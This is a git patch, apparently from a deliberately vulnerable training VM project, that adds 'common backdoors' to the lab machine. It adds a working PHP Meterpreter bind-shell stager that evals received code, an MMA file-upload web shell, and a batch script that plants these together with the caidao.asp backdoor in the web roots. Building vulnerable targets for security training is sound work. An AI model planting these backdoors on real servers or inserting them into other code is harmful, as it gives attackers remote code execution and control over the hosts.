From 5711ad8e29274cdf3a568dc35e5ad2bbe3f2298b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 25 Oct 2016 14:48:21 -0500
Subject: [PATCH] Add common backdoors

---
 Vagrantfile                                | 8 ++++----
 resources/{caidao => backdoors}/caidao.asp | 0
 resources/backdoors/meterpreter.php        | 1 +
 resources/backdoors/mma.php                | 9 +++++++++
 scripts/installs/install_backdoors.bat     | 3 +++
 scripts/installs/setup_caidao.bat          | 1 -
 6 files changed, 17 insertions(+), 5 deletions(-)
 rename resources/{caidao => backdoors}/caidao.asp (100%)
 create mode 100644 resources/backdoors/meterpreter.php
 create mode 100644 resources/backdoors/mma.php
 create mode 100644 scripts/installs/install_backdoors.bat
 delete mode 100644 scripts/installs/setup_caidao.bat

diff --git a/Vagrantfile b/Vagrantfile
index 3cc95eb..bcd9c69 100644
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -33,10 +33,6 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "scripts/installs/setup_ftp_site.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
-  # Vulnerability - Chinese caidao.asp backdoor
-  config.vm.provision :shell, path: "scripts/installs/setup_caidao.bat"
-  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
-
   # Vulnerability - Setup for Apache Struts
   config.vm.provision :shell, path: "scripts/chocolatey_installs/java.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
@@ -100,6 +96,10 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "scripts/installs/setup_axis2.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
+  # Vulnerability - Chinese caidao.asp backdoor
+  config.vm.provision :shell, path: "scripts/installs/install_backdoors.bat"
+  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
+
   # Configure Firewall to open up vulnerable services
   config.vm.provision :shell, path: "scripts/configs/configure_firewall.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
diff --git a/resources/caidao/caidao.asp b/resources/backdoors/caidao.asp
similarity index 100%
rename from resources/caidao/caidao.asp
rename to resources/backdoors/caidao.asp
diff --git a/resources/backdoors/meterpreter.php b/resources/backdoors/meterpreter.php
new file mode 100644
index 0000000..20c75ce
--- /dev/null
+++ b/resources/backdoors/meterpreter.php
@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); $ip = '0.0.0.0'; $port = 4444; if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();
diff --git a/resources/backdoors/mma.php b/resources/backdoors/mma.php
new file mode 100644
index 0000000..4a600a2
--- /dev/null
+++ b/resources/backdoors/mma.php
@@ -0,0 +1,9 @@
+<?php 
+echo '<b><br><br>'.php_uname().'<br></b>'; 
+echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
+echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
+if( $_POST['_upl'] == "Upload" ) { 	
+if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uplod d0n3 in SAME file // Th3 MMA \\</b><br><br>'; } 	
+else { echo '<b>Upload GAGAL !!!</b><br><br>'; 
+} } 
+?>
diff --git a/scripts/installs/install_backdoors.bat b/scripts/installs/install_backdoors.bat
new file mode 100644
index 0000000..1d35754
--- /dev/null
+++ b/scripts/installs/install_backdoors.bat
@@ -0,0 +1,3 @@
+copy C:\vagrant\resources\backdoors\caidao.asp "C:\inetpub\wwwroot"
+copy C:\vagrant\resources\backdoors\mma.php "C:\wamp\www"
+copy C:\vagrant\resources\backdoors\meterpreter.php "C:\wamp\www"
diff --git a/scripts/installs/setup_caidao.bat b/scripts/installs/setup_caidao.bat
deleted file mode 100644
index daa3fb8..0000000
--- a/scripts/installs/setup_caidao.bat
+++ /dev/null
@@ -1 +0,0 @@
-copy C:\vagrant\resources\caidao\caidao.asp "C:\inetpub\wwwroot"
\ No newline at end of file